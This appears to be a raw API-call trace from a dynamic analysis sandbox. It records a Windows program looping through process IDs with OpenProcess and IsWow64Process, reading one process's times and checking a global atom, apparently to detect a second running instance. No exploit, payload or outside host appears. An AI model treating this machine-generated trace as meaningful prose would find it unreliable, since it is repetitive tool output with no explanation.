	[0091.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.066] CloseHandle (hObject=0x20c) returned 1
	[0091.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.066] CloseHandle (hObject=0x20c) returned 1
	[0091.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.067] CloseHandle (hObject=0x20c) returned 1
	[0091.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.067] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.067] CloseHandle (hObject=0x20c) returned 1
	[0091.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.067] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.067] CloseHandle (hObject=0x20c) returned 1
	[0091.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.067] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.067] CloseHandle (hObject=0x20c) returned 1
	[0091.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.067] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.067] CloseHandle (hObject=0x20c) returned 1
	[0091.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.067] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.067] CloseHandle (hObject=0x20c) returned 1
	[0091.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.068] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.068] CloseHandle (hObject=0x20c) returned 1
	[0091.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.068] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.068] CloseHandle (hObject=0x20c) returned 1
	[0091.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.068] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.068] CloseHandle (hObject=0x20c) returned 1
	[0091.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.068] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.068] CloseHandle (hObject=0x20c) returned 1
	[0091.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.068] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.068] CloseHandle (hObject=0x20c) returned 1
	[0091.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.068] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.068] CloseHandle (hObject=0x20c) returned 1
	[0091.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.069] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.069] CloseHandle (hObject=0x20c) returned 1
	[0091.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.069] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.069] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.069] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.069] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.070] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.070] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.070] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.070] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.070] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.070] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.071] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.071] CloseHandle (hObject=0x20c) returned 1
	[0091.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.071] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.071] CloseHandle (hObject=0x20c) returned 1
	[0091.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.147] CloseHandle (hObject=0x20c) returned 1
	[0091.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.147] CloseHandle (hObject=0x20c) returned 1
	[0091.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.147] CloseHandle (hObject=0x20c) returned 1
	[0091.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.148] CloseHandle (hObject=0x20c) returned 1
	[0091.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.148] CloseHandle (hObject=0x20c) returned 1
	[0091.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.148] CloseHandle (hObject=0x20c) returned 1
	[0091.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.148] CloseHandle (hObject=0x20c) returned 1
	[0091.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.148] CloseHandle (hObject=0x20c) returned 1
	[0091.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.149] CloseHandle (hObject=0x20c) returned 1
	[0091.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.149] CloseHandle (hObject=0x20c) returned 1
	[0091.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.149] CloseHandle (hObject=0x20c) returned 1
	[0091.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.149] CloseHandle (hObject=0x20c) returned 1
	[0091.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.149] CloseHandle (hObject=0x20c) returned 1
	[0091.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.150] CloseHandle (hObject=0x20c) returned 1
	[0091.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.150] CloseHandle (hObject=0x20c) returned 1
	[0091.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.150] CloseHandle (hObject=0x20c) returned 1
	[0091.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.150] CloseHandle (hObject=0x20c) returned 1
	[0091.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.150] CloseHandle (hObject=0x20c) returned 1
	[0091.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.151] CloseHandle (hObject=0x20c) returned 1
	[0091.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.151] CloseHandle (hObject=0x20c) returned 1
	[0091.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.151] CloseHandle (hObject=0x20c) returned 1
	[0091.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.151] CloseHandle (hObject=0x20c) returned 1
	[0091.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.151] CloseHandle (hObject=0x20c) returned 1
	[0091.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.152] CloseHandle (hObject=0x20c) returned 1
	[0091.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.152] CloseHandle (hObject=0x20c) returned 1
	[0091.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.152] CloseHandle (hObject=0x20c) returned 1
	[0091.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.152] CloseHandle (hObject=0x20c) returned 1
	[0091.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.152] CloseHandle (hObject=0x20c) returned 1
	[0091.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.152] CloseHandle (hObject=0x20c) returned 1
	[0091.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.153] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.153] CloseHandle (hObject=0x20c) returned 1
	[0091.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.153] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.153] CloseHandle (hObject=0x20c) returned 1
	[0091.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.153] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.153] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.153] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.153] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.154] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.154] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.154] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.154] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.154] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.154] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.155] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.155] CloseHandle (hObject=0x20c) returned 1
	[0091.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.155] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.155] CloseHandle (hObject=0x20c) returned 1
	[0091.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.226] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.226] CloseHandle (hObject=0x20c) returned 1
	[0091.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.226] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.226] CloseHandle (hObject=0x20c) returned 1
	[0091.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.227] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.227] CloseHandle (hObject=0x20c) returned 1
	[0091.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.227] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.227] CloseHandle (hObject=0x20c) returned 1
	[0091.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.227] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.227] CloseHandle (hObject=0x20c) returned 1
	[0091.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.227] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.227] CloseHandle (hObject=0x20c) returned 1
	[0091.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.228] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.228] CloseHandle (hObject=0x20c) returned 1
	[0091.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.228] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.228] CloseHandle (hObject=0x20c) returned 1
	[0091.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.228] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.228] CloseHandle (hObject=0x20c) returned 1
	[0091.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.228] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.228] CloseHandle (hObject=0x20c) returned 1
	[0091.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.229] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.229] CloseHandle (hObject=0x20c) returned 1
	[0091.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.229] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.229] CloseHandle (hObject=0x20c) returned 1
	[0091.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.229] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.229] CloseHandle (hObject=0x20c) returned 1
	[0091.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.229] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.229] CloseHandle (hObject=0x20c) returned 1
	[0091.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.229] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.229] CloseHandle (hObject=0x20c) returned 1
	[0091.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.230] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.230] CloseHandle (hObject=0x20c) returned 1
	[0091.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.230] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.230] CloseHandle (hObject=0x20c) returned 1
	[0091.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.230] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.230] CloseHandle (hObject=0x20c) returned 1
	[0091.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.230] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.230] CloseHandle (hObject=0x20c) returned 1
	[0091.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.230] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.230] CloseHandle (hObject=0x20c) returned 1
	[0091.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.230] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.230] CloseHandle (hObject=0x20c) returned 1
	[0091.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.231] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.231] CloseHandle (hObject=0x20c) returned 1
	[0091.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
